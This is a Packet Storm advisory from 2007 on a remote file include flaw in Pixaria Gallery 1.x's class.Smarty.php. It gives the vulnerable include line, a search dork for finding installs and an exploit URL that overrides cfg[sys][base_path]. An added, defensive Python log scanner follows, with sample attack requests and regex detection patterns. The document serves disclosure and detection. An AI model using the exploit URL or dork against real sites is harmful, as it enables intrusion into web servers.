pizaria-rfi.txt

2007-04-17T00:00:00
ID PACKETSTORM:55965
Type packetstorm
Reporter irvian
Modified 2007-04-17T00:00:00

Description

                                        
`Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability
  
-----------------------------------------------------------------------------------------  
# scripts : Pixaria Gallery 1.x  
# Discovered By : irvian  
# scripts site : http://pixaria.com/  
# Thanks To : #hitamputih #nyubicrew #patihack  
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz  
# dork : powered by Pixaria. Gallery  
------------------------------------------------------------------------------------------  
bug found:  
  
/resources/includes/class.Smarty.php  
// Load the main Smarty class  
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");  
  
  
Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]   
  
`
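
Added example (not part of the original advisory or Pixaria's code): the require_once above takes its path prefix from $cfg, which a request can supply when the file is requested directly with register_globals enabled, so requests carrying cfg[...] parameters are worth flagging in web server logs. The Python below classifies access-log lines for that pattern. The combined log format, the sample lines, /index.php and the names classify, scan and SAMPLE_LOG are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Query keys that overwrite the $cfg array, e.g. cfg[sys][base_path]
CFG_PARAM = re.compile(r"^cfg(\[[^\]]*\])*$", re.IGNORECASE)
# A value starting with scheme:// makes the include path point off the local disk
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)
# Include-only directory named in the advisory; no page should link to it
INCLUDE_DIR = "/resources/includes/"
# Request field of a combined-format access log line (assumed log format)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return 'rfi-attempt', 'cfg-override', 'direct-include' or None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    # parse_qsl percent-decodes keys and values, so cfg%5Bsys%5D... is caught too
    values = [v for k, v in parse_qsl(query, keep_blank_values=True)
              if CFG_PARAM.match(k)]
    if any(REMOTE.match(v) for v in values):
        return "rfi-attempt"      # include path redirected to a remote scheme
    if values:
        return "cfg-override"     # $cfg supplied by the client, local value
    if INCLUDE_DIR in unquote(path).lower():
        return "direct-include"   # include file requested without an entry point
    return None

# Constructed sample lines (documentation addresses and example.invalid only)
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Apr/2007:10:00:01 +0000] "GET /resources/includes/class.Smarty.php?cfg[sys][base_path]=http://example.invalid/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [17/Apr/2007:10:00:02 +0000] "GET /resources/includes/class.Smarty.php?cfg%5Bsys%5D%5Bbase_path%5D=HTTP%3A%2F%2Fexample.invalid%2F HTTP/1.1" 200 512',
    '198.51.100.4 - - [17/Apr/2007:10:00:03 +0000] "GET /index.php?cfg[sys][base_path]=/tmp/ HTTP/1.1" 200 900',
    '198.51.100.4 - - [17/Apr/2007:10:00:04 +0000] "GET /resources/includes/class.Smarty.php HTTP/1.1" 200 0',
    '192.0.2.10 - - [17/Apr/2007:10:00:05 +0000] "GET /index.php?page=gallery HTTP/1.1" 200 4096',
]

def scan(lines):
    """Return (verdict, line) pairs for every line that needs review."""
    return [(v, l) for l in lines if (v := classify(l))]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(f"{verdict:15} {line}")
```

Any of the three verdicts on a production host is a reason to check whether register_globals is enabled and whether the include directory is reachable from the web.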